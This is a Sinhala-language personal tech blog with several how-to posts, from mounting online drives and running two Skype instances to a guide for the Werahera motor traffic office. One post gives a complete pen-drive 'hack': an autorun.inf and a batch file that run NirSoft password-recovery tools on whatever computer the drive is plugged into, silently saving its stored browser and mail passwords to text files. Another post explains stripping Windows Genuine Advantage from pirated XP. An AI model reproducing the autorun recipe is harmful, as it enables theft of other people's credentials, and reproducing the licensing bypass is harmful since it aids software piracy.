Latest Entries »

අදත් මම කියල දෙන්න යන්නෙ ට්‍රික් එකක් තමයි. එකක් කිව්වට මේක දෙකක්.

අපි හැමෝම වගේ දන්නව දැන් මේ E-Mail Usersලාට ඒ ඒ Service Providersලා ප්‍රදානය කරන

Services එකිනෙකට වෙනස්.  ඒත් මේ Online Storage Drive කියන ඒවා දැන් සීඝ්‍රයෙන් ව්‍යාප්ත වෙමින් පවතිනවා

ඒ වගේම ඒවයේ ප්‍රයෝජනත් කියල නිම කරන්න බෑ..

ඒ වගේ Services ලබාදෙන ප්‍රධාන පෙලේ ආයතන දෙකක් හඳුන්වාදී ඇති පහසුකමක්

ගැන තමයි අද මම පාඨක ඔබට කියල දෙන්න යන්නෙ.

1.  Gmail (Google Mail) – GmailDrive

2. Live Mail (Hotmail) – SkyDrive

ඔය පහසුකම් හඳුන්වල දීපු අලුත අපිට ඒ ඒ Username සහ Password ලබාදී එය තුලට

ලොග් වෙලා තමයි Files Upload කරන්න සිද්ධවුනේ.

ඒත් දැන් ඒව වෙනස් වෙලා ඒව ඔබේ My Computer තුලට ඇවිල්ල..  වැඩ තව පහසු වෙලා..

අපි බලමු මේව කොහොමද කරගන්නෙ කියල.

මේවා My Computer තුල Enable කර ගන්න ඔබ විසින් මේ මෘදුකාංග ඔබේ පරිගනකයේ

ස්ථාපනය කරගත යුතුයි. මෙහෙමයි කරන්නෙ..

 

 

1. Gmail සඳහා GmailDrive

 

 

2. Windows Live  සඳහා SkyDrive Explorer (SD Explorer)

මෘදුකාංග දෙක බාගත කරගන්න පින්තූර මත ඔබන්න.

 

View full article »

අද මම කියල දෙන්න යන්නෙ පොඩි Trick එකක්..

සමහර කස්ටිය මේ ක්‍රමේට හැක් කරනව කියලත් කියනව..

ඒ කොහොම කිව්වත්, මේ පොඩි ටූල්ස් ටිකෙන් ගොඩක් දේවල් කරන්න පුලුවන්.

විශේෂයෙන්ම අමතක වුන මුරපදයක් Internet Explorer වල Save වෙලා තියෙනව නම්,

අපිට ඒ මුරපදය මේ ටූල් එක භාවිතා කරල නැවත මතක් කර ගැනීමක් (Retrieve) කරන්න පුළුවන්.

හැක් කරන ක්‍රමයත් මේකම තමයි. ඒක අන්තිමට කියල දෙන්නම්කො කස්ටියට..

(පොඩි Batch File එකක් ලියන්න තියෙනව Autorun එකක් එක්ක)

 

 

1.  මෙය බාගත කරන්න.  IE Pass View from Nirsoft (Internet Explorer සඳහා)

2.  Outlook Express, MS Outlook, Eudora, Mozilla Thunderbird, Yahoo Messenger, Gmail, Incredimail සඳහා මෙය බාගත කරන්න. (Mail Pass View from Nirsoft)

3.  Firefox මුරපද සඳහා මෙය බාගත කරන්න.  (Password Fox)

දැන් හැකින් පොඩ්ඩ ඉගෙනගමු. හැබයි භාවිතා වෙන්නෙ ඔය උඩින් සඳහන් කල ටූල්ස් ටිකම තමයි.
විශේෂ දෙයකට තියෙන්නෙ Autorun File එකකුයි, Batch File එකකුයි එකතු වෙන එකයි.
අවශ්‍ය දේ : Pen Drive එකක්

1. Autorun File එක හදාගන්න මේ විදියට. (autorun.inf)

[autorun]
open=launch.bat
ACTION= Perform a Scan

i.  ඔතන මම ඉස්සෙල්ලම දීල තියෙන්නෙ අපි හදන්න යන Batch File එකේ නම.

ii. දෙවෙනියට තියෙන්නෙ Pen Drive එක අපි Computer එකට Plug කලාම Pen එක Perform කලයුතු Action එක.

Run Program

2.  Batch File එක හදාගන්න මේ විදියට. (launch.bat)

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

i. ඔය විදියට Type කරල  Launch.bat නමින් Save කරගන්න.

3.  ඊට පස්සෙ ඔය File දෙක Pen Drive එකට Copy කරගන්න.

ඔයාලගෙ පහසුවට මම Link ටික අයෙ දාන්නම්. මොකද මම උඩින් සඳහන් කරපු ටූල් වලට අමතරව තව පොඩි ටූල්

කීපයකුත් Batch File එකේ සඳහන් කරලා තියෙන නිසා.

mspass.exe
mailpv.exe
iepv.exe
pspv.exe
passwordfox.exe

4. ඔය Zip Files ටික Download කරගෙන Pen Drive එකට Extract කරගන්න. (Root of the Pen Drive)

එතකොට Pen Drive එකේ ඔය Files ටික පෙන්නන්නෙ මෙහෙමයි.

(රතු පාටින් රවුම් කරල තියෙන Text File ටික එන්නෙ අර Batch File එක Run කලාම Computer එකේ)

Saved Text Files

මම ඔය රතු පාටින් රවුම් කරල තියෙන්නෙ Save වුන Password අඩංගු Text File ටික.

ඔන්න ඔහොමයි වැඩේ කරන්නෙ.. අදහස් දක්වන්නකො කරල බලල.. 😉

අදත් ගොඩක් ප්‍රොයෝජනවත් දෙයක් මගේ පාඨකයන්ට තිලිණ කරන්නට සිතුනා.

මේ ක්‍රමය මම පසුගිය අවුරුද්දෙ ලංකාවෙ කාර්යාලයෙ රාජකාරි කරන කාලයෙ Server එකේ Group Policy එකක් විදියට Deploy කරපු දෙයක්. එකේ Domain Users ලට යූ.එස්.බී පාවිච්චිය නැති කිරීම සඳහා..  මොකද මටයි කරදරේ ඔව වලින් වයිරස් ආවම Server එකට..

මම නෙ කට්ට කන්න ඕන Virus ආවම මගෙ Server එකට.. lol 😀

 

Block USB

 

USB Block කිරීමට මේ උපදෙස් ජාලගත කල පරිගනකයකට..

USB Drive එකක් දැනටමත් ඔබේ පරිගනකයට Install කරල නම්, මේ උපදෙස් පිලිපදින්න..

 

1.  මේ Drives,Folders තුලට පිවිස මේ Files වලට Deny Permissions දෙන්න (Administrator Full Control)

(Right Click>Properties>Permissions>Deny)

%SystemRoot%\Inf\Usbstor.pnf

%SystemRoot%\Inf\Usbstor.inf

1. %SystemRoot%\Inf folder තුලට පිවිසෙන්න.
2. Right-click > Usbstor.pnf > Properties.
3. Security tab එක Click කරන්න.
4. User names list,Groups වලින් යූ.එස්.බී Block කිරීමට අවශ්‍ය පුද්ගලයාගේ නම සොයා දෙන්න (set Deny permissions).
5. UserName හෝ GroupName list > Permissions > Deny check box එක තෝරන්න. (next to Full Control) > OK

ඔය විදියටම System කියන account එකත් Deny list වලට ඇතුලත් කරන්න.

1.In the Group or user names list, select the SYSTEM account.
2.In the Permissions for UserName or GroupName list, click to select the Deny check box next to Full Control, and then click OK.
3.Right-click the Usbstor.inf file, and then click Properties.
4.Click the Security tab.
5.In the Group or user names list, add the user or group that you want to set Deny permissions for.
6.In the Permissions for UserName or GroupName list, click to select the Deny check box next to Full Control.
7.In the Group or user names list, select the SYSTEM account.
8.In the Permissions for UserName or GroupName list, click to select the Deny check box next to Full Control, and then click OK.

ඔන්න මම ඉංගිරීසියෙන්ම දැම්ම.. 🙂

 

 

අලුතෙන් යූ.එස්.බී එකක් Computer එකට Plug කරන්න යනවා නම් මෙහෙම කරන්න.

(ජාලගත හෝ ජාලගත නොකළ පරිගණක දෙවර්ගයම සඳහා මේ ක්‍රමය භාවිතා කරන්න [XP or Server OS])

 

1. Start Menu > Run > Regedit  පිවිසෙන්න.

2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor  පිවිසෙන්න.

3. details pane  එකේ Start double-click  කරන්න.

4. Value data box  එකේ 4 ටයිප් කරන්න.  දැනටමත් Select වෙලා නැත්නම්,  Hexadecimal තෝරන්න. පසුව OK.

5. Registry Editor Close කරන්න.

වැඩේ ඉවරයි. Check කරල  බලල  ඔබේ අදහස්  දක්වන්න.

 

ස්කයිප් කියන්නෙ මොකද්ද කියල මම කියන්න ඕන නෑනෙ යාලුවනේ.. වැඩි කතා නැතුව වැඩේට බහිමු..

1. ඩෙස්ක්ටොප් එකේ Right Click කරල New Shortcut


2. ඊට පස්සෙ මෙහෙම ටයිප් කරන්න..
"C:\Program Files\Skype\Phone\Skype.exe" /secondary
(උදෲත පාඨ දාන්න මතක ඇතුව.. (මේවා " "))

Shortcut Path

3. මේ path එක skype දාල තියෙන තැන, OS දාල තියෙන තැන අනුව වෙනස් කරගන්න ඕන. (C:\ හෝ D:\)

4. හරි. දැන් වැඩේ ඉවරයි. Double Clik කරල බලන්න.
2 Skypes

 

“The copy of windows is not genuine,You maybe a victim of software counterfeiting”

XP අළුතෙන් දැම්මම හරි, තියෙන XP Copy එක වැරදිලා අප්ඩේට් උනොත් හරි මෙහෙම Errors එන්නෙ මොකද අපි ලංකාවෙ හැමෝම පොහොසත් පුද්ගලයන් නොවෙන නිසා, ඔරිජිනල් OS දාන්නත්, පොහොසත් අය තමන්ගෙ සල්ලි ඉතුරු කරගන්නත්, වැඩිය කරදර නොවී ගෙදර ඉඳන්ම ඩවුන්ලෝඩ් කරගන්න පුලුවන් නිසත් අපි මේ “NON Genuine OS” (විශේෂයෙන්ම Windows) භාවිතා කරනවා.

අපි අද කතා කරන්නෙ මෙහෙම ස්ථාපනය කල/Install කල  XP Copy එකක් වැරදිලා අප්ඩේට් උනොත් පෙන්නන මේ Error එක නැතිකර ගන්නෙ කොහොමද කියන එක ගැනයි.

1.  C:\Windows\Downloaded Program Files වෙත යන්න..

2.  එම Folder එක ඇතුලෙ  තියෙනවනම් .WGA අකුරු තුන තියෙන Folder, Files එකක් හෝ කිහිපයක්, ඒවා මකල දාන්න (Delete).

3. පරිඝනකය Restart කර Safe Mode වෙත පිවිසෙන්න.. (පරිගනකය පණගන්වා, XP Bootscreen එකෙන් පසු Keyboard එකේ F8 Key එක Press කරන්න) Advanced Startup Options > Safe Mode

4. පසුව මෙම Folders තුලට පිවිසෙන්න.

C:\Windows\System32 ( wgatray.exe file එක wgatrayold.exe ලෙස නැවත නම් කරන්න)

C:\Windows\System32\dllcache ( wgatray.exe file එක wgatrayold.exe ලෙස නැවත නම් කරන්න)

:- dllcache කියන්නෙ Windows Folder එක තුල තිබෙන Hidden Folder එකක් (Unhide කරන්න Start Menu> Control Panel > Folder Options> Show Hidden Files and Folders)

5.  Safe Mode Registry එකේ මේ වෙනස්කම් කරන්න.

Start Menu >Run> type Regedit > Ok

Registry Editor එකේ  මෙම keys තුලට පිවිසෙන්න.

HKEY_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WGALOGON

මේ WGALOGON Folder එකේ Backup එකක් අපි තියාගන්න ඕන. හදිස්සියෙ මොකක් හරි අප්සට් එකක් වුනොත් මේ Backup එක Restore කරාම හරි. (WGALOGON Folder > Right Click > Export)

6. දැන් ඔය  WGALOGON Folder එක Delete කරන්න.

7. සියලු Folder, Registry Editor Close කර දමා පරිඝනකය Restart කරන්න.

වැඩේ හරි.. 🙂

ආ.. මතක ඇතුව Windows Update “Disable” කරන්න.. නැත්නම් ආයෙ මේ වගේ පොඩි කට්ටක් කන්න වෙයි. 😉

දැන් වෙලඳපොලට එන බොහෝ වීඩියෝ කැම්කෝඩෙර් (Camcorder) බොහෝදුරට JVC Camcorder වලින් වීඩියෝ රෙකෝඩ් කලාම ඒ වීඩියෝ එක කැමරාවට එහෙම නැත්නම් Memory Card එකට Save වෙන්නෙ ____.MOD (File Extension) වලින්.  මේ File එක අපිට .AVI හරි, .MPG හරි අපිට පරිගනකයේ Play කරන්න පුලුවන් විදියට ෆයිල් එක සකසගන්නෙ මෙහෙමයි.  පරිගනකයේ Play කරනවා කියන්නෙ අපිට ඒ File එක Convert කරගන්න්ත් පුලුවන් කියන එකනෙ. DVD එකකට Write කරල  ටී.වී එකේ බලන්න පුලුවන් කියන එකනෙ.. 😉

 

.MOD Extension

 

1.  කරන්න තියෙන්නෙ මෙච්චරයි.. (.MOD) Extension එක (.AVI) හරි (.MPG) විදියට වෙනස් කරන එකයි.  කරලම  බලන්න.. 🙂

Changing Extension

AVI

Changed..

🙂

මේ දිනවල අපේ සහොදරයන්ට තියෙන ගැටලුවක් තමයි මේ යූ.එස්.බී එක Write Protect වෙන ප්‍රශ්නෙ.. එහෙම වුනාම ඒක ෆෝමැට් කරන්න බෑ.. ප්‍රශ්න ගොඩයි ඉතින්… අද මම දෙන පොඩි සොෆ්ට්වෙයා එකකින් ඔය ප්‍රශ්නෙ විසඳගන්න පුලුවන්. මේ සොෆ්ට්වෙයා එක තමයි Smart Virus Remover 1.43 කියන එක.

මෙහෙමයි වැඩේ කරන්නෙ..

1.  බාගන්න මෙතනින්.

2. ස්ථාපනය කරන්න.

යූ.එස්.බී එක ෆොර්මැට් කරන්න නම් මෙහෙමයි කරන්න ඕන. ඉස්සෙල්ලම අපි ඔය “Write Protection” කියන එක අයින් කරගන්න ඕන.

ඊට පස්සෙ  Smart Virus Remover කියන Software එක Double Click කරල  මම පින්තූරෙ පෙන්නල  තියෙන විදියට Taskbar එකේ icon එක Right Click කරල  “Disable USB Write Protect” කියන Command එක Click කරන්න.  දැන් වැඩේ හරි.

ඔය පොඩි සොෆ්ට්වෙයා කෑල්ලෙ තව දේවල් තියෙනව.. පරිගණකයට ව්යිරස් එකක් ගියාම ඉස්සෙල්ලම වෙන්නෙ හංගපු ඒව හැංගිලාම යන එක නෙ..එක අපි Tools>Folder Options>Show Hidden files කලාට පෙන්නන්නෙම නෑ..  ඒ ප්‍රශ්නෙට විසඳුමකුත් මේකෙ අඩංගු කරල තියෙනවා.

Restore Windows Default Settings..  ක්ලික් කරන්න විතරයි තියෙන්නෙ..

ඉස්සෙල්ලම අපිට Command Prompt එක Administrator විදියට Open කරගන්න ඕන..

මෙහෙමයි..

1. Start Menu>type CMD> Right Click> Run as Administrator

2. Type>diskpart ඊටපස්සෙ Enter

3. list disk ඊටපස්සෙ Enter

4.  මම මේ පෝස්ට් එක ලියන්න උදාහරණයක් විදියට ගත්ත නිසා මගේ යූ.එස්.බී එක Disk 4, 65MB විදියට තියෙන්නෙ..බය වෙන්න දෙයක් නෑ….:)

5.  ඊට පස්සෙ මේ විධාන ටික දෙන්න.. පින්තූරෙ පෙන්නලත් තියෙනව..

clean
create partition primary
select partition 1
active
format fs=ntfs
assign
exit

6. CMD එක close කරන්න එපා. Minimize කරන්න.
7. Windows DVD එක Drive එකට දාන්න.
8. ඔබගේ USB එකේ, DVD Drive එකෙයි Drive Letters මතක තියාගන්න.
9. ආයෙත් Command Prompt එකට ගිහින් මෙහෙම ටයිප් කරන්න.
cd boot > enter
bootsect.exe/nt60 k: (k: කියන්නෙ USB එකේ Drive Letter එක)

10. Command Prompt එක close කරල  Windows DVD එක ඇතුලෙ තියෙන ඔක්කොම Files, Folders ටික USB එකට Copy කරන්න.. වැඩේ ඉවරයි..!! 🙂


							
සමහරවිට සෑහෙන්න කට්ටිය බලන් ඉන්න ඇති මම මොකද මගෙ බ්ලොගයට නැවතීමේ තිතක් තිබ්බේ කියල.. 
සෑහෙන්න කාලයක්.. අවුරුද්දකටත් ලං වෙන්න ඇවිත්.. මේ කාලය කියන දේ හරිම ඉක්මනින් ගෙවී යනව නෙවැ..

කොටින්ම කියනවනම්, මේ ටික කාලෙට මට මුරපදයත් අමතකවෙලා... 
ඊ-මේල් ලිපිනයට සහ වර්ඩ්ප්‍රෙසයේ ඉක්මන් කටයුතු වලට ස්තුති වෙන්න මා හට 
මුරපදය වෙනස් කරගැනීමට එතරම් කාළයක් ගතවුනේ නැහැ..

හා හා පුරා කියල.. සෑහෙන්න කාලෙකින්.... ඉතින්..කොහොමද සහෝ

පසුගිය දවසක මම ගියා වේරහැර RMV එකට. මගේ ලයිසන් එකේ වැඩකට. එතනට ගියාම මට තේරුම් ගිය දෙයක් තමයි ගොඩක් මිනිස්සු නොදැනුවත් කම නිසා බොහෝ අපහසුතා වලට පත් වෙනවා. ඒ වෙලාවේ මට හිතුනා මට පුලුවන් තරමින් දැණුවත් කිරීමක් කරා නම් හැමෝටම වැඩක් වෙයි කියන එක. ඒ නිසා හිතුවා ත්‍රෙඩ් එක කරන්න. එහෙනම් ඔන්න වේරහැර වැඩ සිද්ධවෙන පිලිවෙල.

මේ පින්තූරේ මම ගත්ත එකක්. ඔය තියෙන්නේ වේරහැර RMV එකේ පෝලිම. මුලින්ම පෝලිම ගැන කතා කරමුකෝ. මේ පෝලිමට මිනිස්සු එන්නේ පාන්දර 4 ඉඳලා. මේ පෝලිම සතියේ දවස් 5 ම එකම විදිය. සඳුදාටයි සිකුරාදාටයි පෝලිමේ සෙනඟ වැඩියි. ඒක නිසා මොකක් හරි වැඩකට RMV යනවා නම් ඔය දවස් දෙක අතඇරලා යන එක හොඳයි.

RMV එකට යන හැම කෙනෙක්ම ඇතුල් වෙන්න ඕනා මේ පෝලිමේ ගිහිල්ලා. උදේම ගිහිල්ලා පෝලිමේ ඉස්සරහා තැනක් අල්ලා ගත්තොත් තමගේ වැඩේ ඉක්මනින් කරගෙන එන්න පුලුවන් වෙනවා. මිනිස්සු RMV එකට එන්නේ ඇයි? ඒක ගැන පොඩ්ඩක් බලමු. වේරහැර RMV එකෙන් වෙන වැඩ මොනවාද? නව රියදුරු බලපත්‍ර ලබාදීම, නැති වූ බලපත්‍රය වෙනුවට නව බලපත්‍ර නිකුත් කිරීම, රියදුරු බලපත්‍ර අලුත් කිරීම, නව වාහන පන්ති පවතින බලපත්‍රයට එකතු කරගැනීම, නොපැහැදිලි බලපත්‍ර වෙනුවට නව බලපත්‍ර නිකුත් කිරීම, විදේශ රටවල් සඳහා වලංගු බලපත්‍ර නිකුත් කිරීම වගේ දේවල් තමයි මෙතනින් සිද්ධවෙන්නේ. ඒ නිසා විවිධාකාරයේ වැඩ කටයුතු සඳහා මහජනයා මෙතනට පැමිනෙනවා. දැන් තියෙන්නේ අලුත් ලයිසන් එකක්. ඔය පහල රූපෙන් තියෙන්නෙ අලුත් ලයිසන් එක. මේකේ වාහන පන්ති පවා වෙනස්. කාන්තාවන් සඳහා යතුරුපැදි එන්ජින් ධාරිතාව 100 CC වලට වඩා අඩු යනුවෙන් අලුත් පන්තියක් පවා මෙහි තියනවා.

රියදුරු බලපත්‍රය සඳහා වෛද්‍ය සහතිකය අනිවාර්ය වෙනවා. නව බලපත්‍ර, නව වාහන පන්ති එකතු කිරීම ආදී සියලුම කටයුතු වලදී වෛද්‍ය සහතිකය අනිවාර්යයි. ගොඩක් අය මේක දන්නේ නෑ. ඒ නිසා නිලලත් වෛද්‍යවරයෙකුගෙන් වෛද්‍ය සහතිකයක් අරගන්න. සෑම කාර්යක් සඳහාම තමන්ගේ ජාතික හැඳුනුම්පත, උප්පැන්න සහතිකයේ මුල්පිටපත හා වෛද්‍ය සහතිකය අනිවාර්යයි. මේ කිසිම දේක ඡායාපිටපත් අවශ්‍ය වෙන්නේ නෑ. ගොඩක් අය බොරුවට මුදල් වියදම් කරලා ඡායාපිටපත් ගහගෙන එනවා. පරණ ක්‍රමයට උඩුකය ඡායාරූප අරගෙන එනවා. ඒවා උවමනා වෙන්නේ නෑ. RMV එක ඇතුලෙම ඡායාරූප ගැනීම් සිදුකරනවා. අනිවාර්ය වන්නේ තමන්ගේ ජාතික හැඳුනුම්පත, උප්පැන්න සහතිකයේ මුල්පිටපත හා වෛද්‍ය සහතිකය පමනයි. ඒවා සියල්ලක්ම නැවත අප වෙතම ලබා දෙනවා.

වෛද්‍ය සහතිකය ගැනත් යමක් කියන්න ඕනා. බරවාහන සඳහා එකකුත් සැහැල්ලු වාහන සඳහා එකකුත් වශයෙන් වෛද්‍ය සහතික කොටස් දෙකක් තියනවා. බර වාහන සඳහා වෛද්‍ය සහතිකය ලබා ගන්න ඕනා නුගේගොඩින්. එතනින් ලබා දෙන වෛද්‍ය සහතිකයේ අදාල පුද්ගලයාගේ ඡායාරූපයක් ඇලවිය යුතුයුයි. සමහරු මේ ඡායාරූපය නැතුව එනවා. ඒක නිසා මතක තියා ගන්න බර වාහන වෛද්‍ය සහතිකයේ ඡායාරූපයක් අලවාගෙන එන්න. ඡායාරූප ගැනීම RMV එක ඉස්සරහින් උනත් කරගන්නට පුලුවන්. නමුත් මේ ඡායාරූප ශාලා විවෘත වෙන්නේ උදේ 7ට පමන. උදේ 7 වෙනකොට පෝලිමේ සෑහෙන ප්‍රමානයක් පිරිලා. ඒ නිසා ඒ පිළිබඳ පොඩ්ඩක් සැලකිලිමත් වෙන්න. සැහැල්ලු වාහන සඳහා වෛද්‍ය සහතිකය ලබාගැනීමට නම් ඕනෑ තරම් ස්ථාන වේරහැර තියෙනවා. රුපියල් 500ක් මේ සඳහා අයකරනවා. සාමන්‍යෙන් උදෑසන 6:30 පමන වෙනකොට මේ වෛද්‍ය මධ්‍යස්ථාන විවෘතයි. මේ වෛද්‍ය සහතිකය ලබා ගැනීමට වැඩි වෙලාවක් යන්නේ නෑ. ඒ නිසා උදේ පෝලිමට පැමින එහි රැදී සිට ඔබ දෙපස සිටිනා අයට වෛද්‍ය සහතිකය ගැනීමට යැයි පවසා වෛද්‍ය සහතිකයක් ලබාගෙන එන එක තමා හොඳම දේ. ඒ වගේම RMV එක ඇතුලෙත් වෛද්‍ය සහතික දිනකට 50ක් නිකුත් කෙරෙනවා. ඒතනින් වෛද්‍යසහතික ලබාගැනීමට යම් කාලයක් ගත වෙනවා. ඒ නිසා හොඳම දේ තමයි පිටින් වෛද්‍ය සහතිකයක් රැගෙන ඒම.

තව දෙයක් කියන්න ඕනා. කාක්කෝ ගැන අහලා ඇති. පිහාටු නැති කාක්කෝ. ගොඩක් වෙලාවට පෝලිමේ ඉස්සරහට දාලා දෙන්නම් කියමින් මුදල් ඉල්ලන කාක්කෝ සුලබ දසුනක්. මොවුන්ට නම් අහු වෙන්න එපා. මොවුන් නිසා පෝලිමේ මිනිස්සු අතර බොහෝ රන්ඩු සරුවල් ඇති වෙනවා.

උදේ 7:45 වගේ වෙනකොට RMV එකේ ගේට්ටු අරිනවා. පෝලිම ඇතුලට ගන්න. හැමෝම පෝලිමේ ඇතුලට යන්න ඕනා. ඇතුලට ගත්තාට පස්සේ ආරක්ෂක නිලධාරීන් මගින් සුලු දැනුවත් කිරීමකට ලක් වෙනවා. ඉන් පසු අදාල සේවා සඳහා අදාල පෝලිම් වලට මහජනයා යොමු කෙරෙනවා.

වෛද්‍ය සහතික සඳහා එක පෝලිමකුත්, ප්‍රායෝගික හා ලිඛිත පරීක්ෂන සඳහා එක පිරිසකුත්, අනෙක් වැඩ කටයුතු සඳහා එක පෝලිමකුත් වශයෙන් පිරිස පෙලගස්වනවා. මින් දිගම පෝලිම ප්‍රධාන ශාලාවට පෙලගස්වා තියෙන පෝලිමයි. නව රියදුරු බලපත්‍ර සඳහා අයදුම් කිරීම, නැති වූ බලපත්‍රය වෙනුවට නව බලපත්‍ර ලබාගැනීම, රියදුරු බලපත්‍ර අලුත් කිරීම, නව වාහන පන්ති පවතින බලපත්‍රයට එකතු කරගැනීම, නොපැහැදිලි බලපත්‍ර වෙනුවට නව බලපත්‍ර නිකුත් කිරීම, විදේශ රටවල් සඳහා වලංගු බලපත්‍ර නිකුත් කිරීම ආදී දේවල් සඳනා පැමිනි අය තමයි මේ පෝලිමේ ඉන්නේ. තමන් ලබා ගැනීමට පැමිනි සේවාවට අදාල ලියකියවිලි ඉදිරිපස කවුන්ටරය වෙත ඉදිරිපත් කර ඔබට ටෝකන් පතක් ලබා ගන්නට පුලුවන්. පැරණි රියදුරු බලපත්‍ර වෙනුවට නව බලපත්‍ර නිකුත් කිරීමේ එක්දින සේවාවක් වේරහැර ක්‍රියාත්මක වෙනවා. ඒ සඳහා නිකුත් කරන්නේ දිනකට ටෝකන් 200ක් පමනයි. අනෙක් සාමන්‍ය සේවා සඳහා ටෝකන් 900ක් නිකුත් කෙරෙනවා. ටෝකන් ලබා ගැනීමෙන් පසු තමන්ගේ වාරය එනතෙක් රැදීසිටිය යුතුයි.

එක වරකට ටෝකන් අංක 30 බැගින් ඇතුලට ගන්නවා. ඒ රියදුරු බලපත් අංශය වෙත. ඒ තුල තමයි ඔබේ ඡායාරූප ගැනීම්, ඇඟිලි සලකුණු, අත්සන් ආදිය ගැනීම සිදු වෙන්නේ. ඒ අංශය තුල ඔබට කවුන්ටර 3කට පමන යාමට සිදු වෙනවා. ඒ ඔබේ පැරණි බලපත්‍රයේ වාහන පන්ති නව වාහන පන්ති වලට හරවා ගැනීම, ලියකියවිලි ස්කෑන් කිරීම ආදී දේවල් සඳහා. නමුත් වැඩ බොහෝම කාර්යක්ශමයිනොබට ලබා දෙන්නේ මුද්‍රිත අයදුම් පතක්. ඉස්සර වගේ මාගලක් විතර දිග ෆෝම් පුරවන්න දැන් නෑ. නම, ලිපිනය වගේ සරල තොරතුරු කිහිපයක් අහලා තියෙන, ඉතුරු කරුණු සියල්ලක්ම මුද්‍රිත අයදුම්පතක් තමයි ඔබට ලබා දෙන්නේ. ඉක්මනින් ඔබේ වැඩ කටයුත්ත සිදු වෙනවා. අවාසානයේ මුදල් ගෙවීම් සිදු කරන කවුන්ටර් වලින් තමයි තාවකාලික බලපත්‍ර හා ඔබ පැමිනියේ නව බලපත්‍රයක් සඳහා අයදුම් කිරීමට නම් ඔබේ ලිඛිත පරීක්ෂනය සඳහා නියමිත දින බලා දෙන්නේ. ඔබට අවශ්‍ය දිනයක් ඉඩකඩ තියෙන අයුරින් වෙන් කර ගැනීමට ඔබට පුලුවන්. නැතිවූ බලපත්‍රයක් එක්දින සේවය මගින් ලබා ගැනීමට රුපියල් 2200ක මුදලක්ද සාමාන්‍ය ක්‍රමයට ලබා ගැනීමට 1700ක් ද, නව පන්තියක් එකතු කරගැනීමට 1850 සිට ඉහලටද ( L පුවරුද ඇතුලුව) ගාස්තු අයකෙරෙනවා.

ඔබ පැමිනියේ ඔබ සතු රියදුරු බලපත්‍රයට නව වාහන පන්තියක් එක් කරගැනීමට නම් මුදල් ගෙවීමෙන් පසුව ප්‍රධාන ශාලාව පිටිපස ඇති 19 වෙනි කාමරය වෙත යා යුතුයි. ඉස්සර වගේ නැවත ලිඛිත පරීක්ෂනය පෙනී සිටින්න උවමනා වෙන්නේ නෑ. 19 කාමරයේ කවුන්ටරයෙන් ඔබේ ප්‍රායෝගික පරීක්ෂනය සඳහා දිනයක් හා “L” පුවරු ලබාගන්නට පුලුවන්.

එක්දින සේවය ගැන කියනවා නම්, ඔබ අයදුම්පත්‍රය බාර දී පැය 3 1/2 ක් වගේ කාලයක් තුලදී ඔබට නව මුද්‍රිත බලපත්‍රය ලබා ගන්නට පුලුවන්.

Mr.Perera@EK